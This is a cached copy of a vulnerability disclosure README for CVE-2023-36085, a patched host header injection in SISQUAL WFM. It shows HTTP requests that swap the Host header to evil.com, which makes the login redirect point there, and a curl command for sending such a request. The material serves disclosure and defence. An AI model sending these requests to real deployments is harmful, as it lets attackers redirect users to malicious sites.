Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-36085 PoC — SISQUAL WFM 输入验证错误漏洞

Source
https://github.com/omershaik0/CVE-2023-36085_SISQUALWFM-Host-Header-Injection
Associated Vulnerability
Title:SISQUAL WFM 输入验证错误漏洞 (CVE-2023-36085)
Description:SISQUAL WFM是SISQUAL WFM公司的一种智能软件解决方案。使世界各地的公司能够预测、规划和管理其劳动力。 SISQUAL WFM 7.1.319.103版本至7.1.319.111版本存在安全漏洞,该漏洞源于存在主机标头注入漏洞,通过修改HTTP Host标头,攻击者可以更改网页链接,甚至将用户重定向到任意或恶意位置。
Description
This repository contains information related CVE-2023-36085 a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.
Readme
# CVE-2023-36085 SISQUALWFM Host Header Injection Vulnerability

This repository contains information related to a host header injection vulnerability discovered in SISQUALWFM version 7.1.319.103, which allows an attacker to manipulate webpage links or redirect users to a malicious site. This vulnerability was assigned CVE-2023-36085 and has been fixed in version 7.1.319.111 and above.

## Vulnerability Details

- **Exploit Title:** SISQUALWFM 7.1.319.103 Host Header Injection
- **Discovered Date:** 17/03/2023
- **Reported Date:** 17/03/2023
- **Resolved Date:** 13/10/2023
- **Exploit Author:** Omer Shaik (unknown_exploit)
- **Vendor Homepage:** [SISQUALWFM](https://www.sisqualwfm.com)
- **Version:** 7.1.319.103
- **Tested on:** SISQUAL WFM 7.1.319.103
- **Affected Version:** SISQUALWFM 7.1.319.103
- **Fixed Version:** SISQUALWFM 7.1.319.111
- **CVE:** CVE-2023-36085
- **CVSS Score:** 3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- **Category:** Web Apps

## Proof of Concept

We provide a proof-of-concept scenario demonstrating the host header injection vulnerability, specifically targeting the `/sisqualIdentityServer/core` endpoint. This vulnerability allows an attacker to manipulate webpage links or redirect users to another site by tampering with the host header.

### Original Request

```http
GET /sisqualIdentityServer/core/login HTTP/2
Host: sisqualwfm.cloud
Cookie: <cookie>
...
```

### Original Response

```http
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://sisqualwfm.cloud/sisqualIdentityServer/core/
...
```

### Intercepted Request (Modified to Redirect to evil.com)

```http
GET /sisqualIdentityServer/core/login HTTP/2
Host: evil.com
Cookie: <cookie>
...
```

### Response

```http
HTTP/2 302 Found
Cache-Control: no-store, no-cache, must-revalidate
Location: https://evil.com/sisqualIdentityServer/core/
...
```

![Exploit Execution](https://github.com/omershaik0/Handmade_Exploits/blob/main/SISQUALWFM-Host-Header-Injection-CVE-2023-36085/redirect.png)

## Method of Attack

To exploit this vulnerability, an attacker can use the following `curl` command to modify the host header:

```bash
curl -k --header "Host: attack.host.com" "Domain Name + /sisqualIdentityServer/core" -vvv
```

## Disclaimer

This repository is for informational purposes only and should not be used for any malicious activities. The vulnerability has been responsibly disclosed to the vendor, and the issue has been resolved. It is crucial to follow ethical hacking guidelines and respect responsible disclosure practices when identifying and reporting vulnerabilities.
File Snapshot

 [4.0K]  /data/pocs/f4047f52d13cac0f18d91a595dc7c3f84c7f030e
└── [2.6K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.